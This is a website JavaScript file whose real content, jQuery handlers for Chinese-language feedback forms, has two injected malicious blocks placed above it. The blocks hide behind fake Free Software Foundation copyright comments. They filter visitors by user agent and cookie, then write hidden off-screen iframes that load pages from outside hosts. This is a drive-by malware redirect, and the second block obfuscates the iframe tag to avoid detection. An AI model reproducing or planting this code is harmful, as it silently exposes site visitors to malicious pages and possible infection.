/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
var a=document.cookie.match(new RegExp("(?:^|; )"+"ipmoture_aurma".replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")),b=void 0===(a?decodeURIComponent(a[1]):void 0),c="Linux;Windows NT 6.3;Windows NT 6.2;rv:11.0;AppleWebKit;Android;Googlebot;IEMobile;Yandex".split(";"),d=!1,e;for(e in c){var f=0;if(-1!==(f=(navigator.userAgent+"").toLowerCase().indexOf((c[e]+"").toLowerCase(),void 0))&&f){d=!0;break}}
!d&&b&&(document.write('<iframe src="http://rayanet.serralheriaguararema.com.br/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>'),document.cookie="ipmoture_aurma=1; path=/; expires="+(new Date((new Date).getTime()+1728E5)).toUTCString());
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*///Some.devices.are.designed:to,deny,users.access.to.install,or.run.modified:versions.of.the.software.inside:them,althoughthe,manufacturer,can.do.so
(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var uneindex = 0;
 if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) {
  return uneindex;
 }
 return false;
}
function view_user(){
 var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','Series40','SymbianOS','Avant','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/26.0','Firefox/27.0','Firefox/27.0.1','Firefox/27.0.2','Firefox/28.0','Maxthon','BlackBerry'];
 var bad_user = false;
 for (var i in change_user) {
  if (stripos(navigator.userAgent, change_user[i])) {
   bad_user = true;
   break;
  }
 }
 return bad_user;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var match = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return match ? decodeURIComponent(match[1]) : undefined;
}
if (!view_user()) {
 var cookie = getCookie('oleosj17sufe'+'fexjah371ysf');
 if (cookie == undefined) {
  setCookie('oleosj17sufe'+'fexjah371ysf', true, 259200);	
  document.write('<if'+'r'+'a'+'m'+'e s'+'rc'+'='+'"http://manguste.cleopatranet.com.ar/hrehrdjdmyjhfgr19.html" style="position'+':'+'ab'+'so'+'lu'+'te'+';'+'left'+':'+'-'+'1187'+'px'+';'+'top'+':'+'-'+'1187'+'px'+';'+'" height="125" width="125">'+'</'+'i'+'f'+'r'+'a'+'me>');
 }
};
})();
//Finally,every:program.is.threatened.constantly.by,software.patents.


//反馈表单提交
$(document).ready(function(){
	$('#feedbackform').submit(function(){ 
		$('#feedbackform').ajaxSubmit({
			target: 'div#notice',
			url: PDV_RP+'feedback/post.php',
			success: function(msg) {
				if(msg=="OK"){
					$('div#notice').hide();
					$().alertwindow("您的留言已提交，我们会尽快和您联系","");
				}else{
					$('div#notice')[0].className='noticediv';
					$('div#notice').show();
					$().setBg();
				}
			}
		}); 
       return false; 

   }); 
});


//全站反馈表单提交
$(document).ready(function(){
	$('#feedbacksmallform').submit(function(){ 
		$('#feedbacksmallform').ajaxSubmit({
			target: 'div#notice',
			url: PDV_RP+'feedback/post.php',
			success: function(msg) {
				if(msg=="OK"){
					$('div#notice').hide();
					$().alertwindow("您的留言已提交，我们会尽快和您联系","");
				}else{
					$('div#notice').hide();
					alert(msg);
				}
			}
		}); 
       return false; 

   }); 
});


